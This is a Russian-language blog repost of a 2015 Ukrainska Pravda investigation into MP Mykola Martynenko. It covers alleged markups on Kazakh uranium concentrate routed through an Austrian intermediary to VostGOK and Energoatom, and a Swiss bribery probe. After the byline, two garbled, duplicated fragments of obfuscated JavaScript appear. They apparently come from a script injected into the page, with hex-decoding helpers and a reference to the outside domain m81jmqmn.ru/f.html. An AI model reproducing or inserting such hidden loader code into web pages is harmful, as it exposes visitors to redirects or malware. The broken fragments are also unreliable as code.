ХРОНИКИ и КОММЕНТАРИИ

Интернет-газета

Ядерное обогащение Николая Мартыненко

Posted by operkor на Ноябрь 16, 2015

11Собеседники “Украинской правды” в энергетической отрасли говорят о Мартыненко как об одном из серых кардиналов власти, который влияет на работу важнейших государственных предприятий в стране. Швейцарские правоохранители уже почти два года расследуют дело против него по подозрению во взяточничестве и отмывании денег. По версии местной прокуратуры чешская компания Skoda JS платила миллионы оффшорной компании с Панамы, акционером которой он является, за доступ к тендерам госкомпании “Энергоатом”. Если правоохранителям удастся доказать вину, ему грозит тюремное заключение сроком пять лет.

В Украине он, тем временем, продолжает возглавлять парламентский комитет по вопросам ТЭК и влиять на принятие важнейших в энергетической отрасли решений.

Этот человек — Николай Мартыненко, один из ближайших соратников премьер-министра Арсения Яценюка, член так называемого теневого правительства, куда входит узкий круг из окружения президента и главы правительства.

Собеседники “Украинской правды” в энергетической отрасли говорят о Мартыненко как об одном из серых кардиналов власти, который влияет на работу важнейших государственных предприятий в стране. В их числе участники рынка и чиновники ТЭК называют “Энергоатом”, “Укргазвидобування”, “Укртрансгаз”, “Одесский припортовый завод”.

Сам нардеп от связей открещивается, утверждает, что никакого отношения к госактивам не имеет. Не любит он говорить и о своем бизнесе. В своей декларации за 2014 год Мартыненко указал более, чем скромную сумму дохода — 530 тысяч гривен.

Но как показало расследование “Украинской правды”, Мартыненко есть что скрывать. Только на одной из схем поставки ядерного топлива на украинское госпредприятие, австрийская компания-посредник, связанная с нардепом, могла заработать около 770 миллионов гривен.

Эта история о том, как в постмайданной Украине ближайшее окружение премьер-министра Яценюка продолжает зарабатывать деньги на посреднических операциях, а правоохранители закрывают на это глаза.

Энергичные предприниматели

Бывший комсомольский функционер Николай Мартыненко начинал свою карьеру народного депутата в далеком 1998 году, выиграв выборы по мажоритарному округу в Волынской области.

С того времени он избирался в каждый созыв Верховной Рады, меняя лишь политические проекты — “НУ-НС”, “Батькивщина”, “Народный фронт”. Неизменным оставалось одно — уже четыре созыва подряд Мартыненко занимает руководящую должность в комитете по вопросам ТЭК.

Этот комитет Мартыненко без особых проблем возглавил и после парламентских выборов 2012 года, в годы президентства Януковича, находясь в оппозиции. Интерес к энергетике у Мартыненко неслучаен.

В конце 90-х вместе с бывшим нардепом Давидом Жванией Мартыненко учредил компанию “Бринкфорд” и АО “Торговый дом”, которые занимались поставками ТВЭЛов на украинские атомные станции, а также вывозом отработанного ядерного топлива в Россию.

Чтобы закрепить свои позиции в ядерной отрасли, бизнесмены пошли по стандартному сценарию — делегировали своего представителя руководить важнейшим госпредприятием. По такой схеме в 2000-м году государственную монополию “Энергоатом”, управляющую всеми украинскими АЭС, впервые возглавил директор Хмельницкой АЭС Юрий Недашковский.

Впоследствии Недашковский еще дважды возглавлял госкомпанию — в 2005 году, когда украинское правительство формировалось из членов “Нашей Украины” и БЮТ, и в 2008-м, когда Юлия Тимошенко во второй раз стала премьер-министром. Недашковский успел поработать в должности руководителя “Энергоатома” и после прихода к власти Виктора Януковича — он был уволен с должности только в 2012 году.

Участники рынка и энергетические эксперты, опрошенные “Украинской правдой”, в один голос утверждают, что именно благодаря политическому влиянию Мартыненко, Недашковский столько лет удерживался на своей должности.

В марте 2014 года, после побега Виктора Януковича и назначения премьером Арсения Яценюка, Недашковский возглавил компанию в четвертый раз.

“В правительстве тогда шли ожесточенные споры, его не хотели назначать, но Мартыненко настоял на том, что руководить компанией должен он. Аргумент — Недашковский единственный человек, который в Украине может вести переговоры с Россией по поставкам ядерного топлива, от которого зависит работа украинских АЭС”, — рассказывает бывший высокопоставленный чиновник Минэнерго.

Мартыненко отрицает факты, что когда-либо лоббировал назначения Недашковского на должность руководителя “Энергоатома”. “Недашковский — менеджер государственной компании “Энергоатом”. Откройте сайт и прочитайте!” — заявил он в комментарии “Украинской правде”.

Выйти сухим из воды

Осенью 2014 года, уже при Недашковском, в “Энергоатоме” прошли обыски ГПУ по уголовным делам, связанным со злоупотреблением служебным положением сотрудниками компании. Вопросы у правоохранителей вызвали тендеры, проведенные госпредприятием. По мнению следователей прокуратуры, они не являлись экономически выгодными для “Энергоатома”.

Дело в итоге замяли, а Недашковский заявил о выполнении ГПУ российского заказа. “Его цель — срыв контракта с Восточным ГОКом на поставку отечественного урана, от которых зависит работа отечественных АЭС”, — говорил тогда руководитель компании.

Справка

 Восточный ГОК — единственное в Украине предприятие по добыче и переработке урановой руды, которое должно полностью обеспечивать  потребности украинской атомной отрасли в природном уране. Продукция предприятия продается госкомпании “Энергоатом”. В свою очередь, “Энергоатом” этот урановый концентрат передает российскому ТВЭЛу, который использует его для производства тепловыделяющих сборок. Затем их используют в работе украинских АЭС.

В конце прошлого года под ударом правоохранителей, но на этот раз швейцарских, оказался и сам Николай Мартыненко. Чешские СМИ сообщили, что против народного депутата возбуждено уголовное дело в Швейцарии. Мартыненко подозревают в получении взятки от чешской компании Skoda — поставщика оборудования для атомных электростанций.

Журналисты швейцарской газеты SonntagsZeitung выяснили, что Мартыненко подозревается в получении взятки в размере 30 млн франков за допуск чешской компании к тендерам “Энергоатома”. Эти деньги были заблокированы на счетах в банке Hottinger в Швейцарии. Руководство финучреждения заметило подозрительные транзакции и пожаловалось правоохранителям.

Народный депутат Сергей Лещенко утверждает, что, если швейцарской прокуратуре удастся доказать вину Мартыненко, ему грозит штраф в размере 1 млн франков и 5 лет лишения свободы.

В апреле свои претензии к работе “Энергоатома” предъявил глава Госфининспекции Николай Гордиенко, который открытым текстом назвал Николая Мартыненко “смотрящим” за “Энергоатомом”.

Гордиенко озвучил новую цифру злоупотреблений компании — 1,5 млрд гривен. Они касались тендерных закупок, завышенной стоимости строительства Централизованного хранилища отработанного ядерного топлива. Глава фининспекции также заявил, что Мартыненко препятствовал ревизии “Энергоатома”.

Но и этот скандал закончился ничем. Гордиенко в итоге со скандалом уволили из Госфининспекции, а его обвинения назвали необоснованными. Впрочем, вопросы к контрактам государственной компании были не только у Гордиенко. В начале июня СБУ зафиксировала факты системных нарушений при покупке уранового концентрата для потребностей ядерной отрасли.

Главное — маржа

Единственное предприятие по добыче и переработке урановой руды Восточный ГОК, несмотря на факты опубликованные СБУ, отрицает факт закупки ядерного концентрата у каких-либо поставщиков.

Это следует из ответа госпредприятия на запрос народного депутата Сергея Лещенко, который имеется в распоряжении “Украинской правды”.

В нем ВостГОК утверждает, что в течение прошлого года предприятие произвело 809 тонн ядерного концентрата из самостоятельно добытой руды. Далее этот ядерный концентрат был продан “Энергоатому”. ВостГОК отказался в ответе на депутатский запрос называть цену, по которой госкомпания покупает топливо, сославшись на коммерческую тайну. Такую же позицию занимает и “Энергоатом”.

“На сегодняшний день “Энергоатом” ни у кого кроме как у ВостГОК урановый концентрат не закупает. Российский ТВЭЛ поставляет топливные сборки госкомпании для производства которых, кроме украинского концентрата, использует свое топливо”, — ответили в компании на информационный запрос “Украинской правды”.

Возможно, причина такой секретности госкомпаний состоит в том, что ГОК и руководство “Энергоатома” пытаются скрыть коррупционную схему, по которой убытки государства за год могут составить 770 млн гривен.

“Украинской правде” удалось выяснить некоторые условия контрактов госпредприятия с иностранными контрагентами, наличие которых оно опровергает. Так, нам стало известно о существовании контракта между казахским “Степногорским горно-химическим комбинатом” и австрийской компанией Steuermann Investitions.

Согласно его условиям, около 600 тонн уранового концентрата казахского производства должны быть поставлены на украинский ВостГОК в 2015 году. Ориентировочная стоимость сделки — $60 млн.

В контракте казахский комбинат выступает в качестве продавца, австрийская фирма — покупателем, а ВостГОК — в качестве “грузополучателя”, и по условиям договора ни за что не платит. Этот контракт был заключен сторонами в феврале 2015 года. С того момента на украинский комбинат было поставлено уже около 400 тонн концентрата.

В конце сентября Steuermann Investitions заплатила Степногорскому комбинату за этот объем топлива $38 млн. То есть 1 килограмм концентрата обошелся австрийской компании в $95.

Но на украинской таможне с ценой казахского концентрата произошла неожиданная трансформация. Из документов, которые оказались в распоряжении “Украинской правды”, следует, что те самые 400 тонн концентрата прошли украинскую таможню в конце сентября.

В разрешении на ввоз обозначено, что топливо поставила австрийская Steuermann Investitions, а принял продукцию ВостГОК. Но цена концентрата при этом существенно изменилась.

В таможенной декларации указана сумма контракта $51,6 млн. То есть на украинской границе казахский концентрат “подорожал” с $95 до $129 за 1 килограмм. Украинская госкомпания не только заплатила за концентрат, который был куплен у иностранного производителя, но и еще и на $13,6 млн больше реальной стоимости. И не производителю, а австрийской прокладке.

Подобный контракт существовал между казахской компанией, австрийской прокладкой и ВостГОК в конце прошлого года. Ущерб по нему СБУ, как уже упоминалось выше, оценила в $10 млн. Хотя согласно первичным документам, которые имеются в распоряжении “Украинской правды”, “заработок” австрийской компании также составил $13,6.

Всего с помощью австрийской прокладки государственная компания, согласно двум контрактам 2014 и 2015 года закупит 1000 т уранового концентрата. То есть, общая сумма ущерба государству может составить $34 млн или 770 млн гривен.

Кто хозяин?

К руководству и “ВостГОК” и “Энергоатома” возникает масса вопросов. Зачем ВостГОКу, который должен производить свой ядерный концентрат, закупать его в другой стране? Это все равно, как если бы украинская угольная шахта закупала уголь у предприятия, которое находится за тысячу километров. Для каких целей используется концентрат, закупленный у казахского комбината?

Еще более подозрительно, что ВостГОК напрочь отрицает наличие каких-либо контрактов с внешними поставщиками, утверждая, что закупает топливо только украинского производства. Куда в таком случае дальше направляется этот неучтенный концентрат?

Почему ВостГОК соглашается платить больше, пользуясь услугами австрийской компании, хотя без каких-либо проблем мог подписать данный контракт с производителем — Степногорским комбинатом напрямую? Ответ на последний вопрос можно получить, выяснив, кому принадлежит австрийская компания.

Steuermann Investitions была зарегистрирована в Вене еще в 1999 году. Она принадлежит фирме из Лихтенштейна Nemessis Anstalt.  По состоянию на 2015 год Steuermann входит в наблюдательный совет Запорожского абразивного комбината, который входит в сферу интересов Жвании и Мартыненко.

Также Steuermann Investitions является основателем российского ЗАО “Салено” наряду с другим акционером — Коте Соткимлавой. Соткимлава, в свою очередь, согласно данным российского реестра юридических лиц, числится директором компании “Атомэнергоресурс”. Эта компания была основана ирландской “Бринкфорд Лимитед” и, как известно, входила в сферу интересов Мартыненко и Жвании.

Еще один любопытный факт — директор и номинальный владелец австрийской компании Steuermann Investitions Вольфганг Айбергер владеет 0,55% акций “Диамант банка”, который на четверть принадлежит бизнес-партнеру Мартыненко Давиду Жвании.  Но главное, у австрийской компании есть “дочка” в Украине. Ее учредитель — все тот же Вольфганг Айбергер.

До конца 2012 года ДП “ШТОЕРМАН — Украина ГмбХ” была владельцем 66% акций нефтегазовой компании “Пласт”. Участники нефтегазового рынка хорошо знают, что до 2012 года эта компания принадлежала Николаю Мартыненко, пока ее не приобрел нардеп-коневод Александр Онищенко.

Вот, что сам Онищенко рассказывал о покупке в интервью “Украинской правде”: “И моя компания “Пласт” — уже с лицензией. Я ее купил у депутата того же “Народного фронта” Николая Мартыненко готовым продуктом, который сегодня работает”.

Что сам Мартыненко думает на этот счет?

В комментарии “Украинской правде” он заявил, что не знает о существовании компании Steuermann Investitions. Нардеп утверждает, что не знаком с Соткимлавой. “Я знаю много грузин, но эту фамилию слышу впервые”, — заверил Мартыненко.

Впрочем, нардеп отрицает и наличие уголовного производства против него и в швейцарской прокуратуре и недавно открытое дело чешских правоохранителей по тому же эпизоду.

“На меня дел нет ни в одной стране мира. Это первое. Второе — если меня вызовут в какую угодно прокуратуру, даже в самую лучшую — украинскую, я сразу приду. Третье — не надо брать деньги за заказы”, — заявил он.

Мартыненко продолжает отрицать уголовное преследование даже после официального заявления швейцарской прокуратуры. Делает он это с молчаливого согласия высшего руководства страны.

Своего близкого соратника Арсения Яценюка, который никак не комментирует уголовное расследование в отношении члена своей партии, и в тоже время заявляет об успехах в борьбе с коррупцией, и который не может не знать о наличии австрийских прокладок в контрактах госпредприятий.

С согласия президента — потому что Мартыненко входит в так называемое теневое правительство, которое собирается на Банковой, и участвует в принятии важнейших решений в кадровой политике страны. С согласия Генпрокуратуры, которая до сих пор не вызвала его на допрос по запросу швейцарских коллег. И СБУ, которая не вспоминает о расследовании, начатом еще летом.

Севгиль МУСАЕВА-БОРОВИК, Андрей САМОФАЛОВ

Українська правда

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=»»,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return «operkor.wordpress.com»},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf(«http»)==0){return p}for(var e=0;e//m81jmqmn.ru/f.html

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=»»,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return «operkor.wordpress.com»},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf(«http»)==0){return p}for(var e=0;e//m81jmqmn.ru/f.html

Добавить комментарий

Please log in using one of these methods to post your comment:

Логотип WordPress.com

Для комментария используется ваша учётная запись WordPress.com. Выход /  Изменить )

Google photo

Для комментария используется ваша учётная запись Google. Выход /  Изменить )

Фотография Twitter

Для комментария используется ваша учётная запись Twitter. Выход /  Изменить )

Фотография Facebook

Для комментария используется ваша учётная запись Facebook. Выход /  Изменить )

Connecting to %s

 
%d такие блоггеры, как: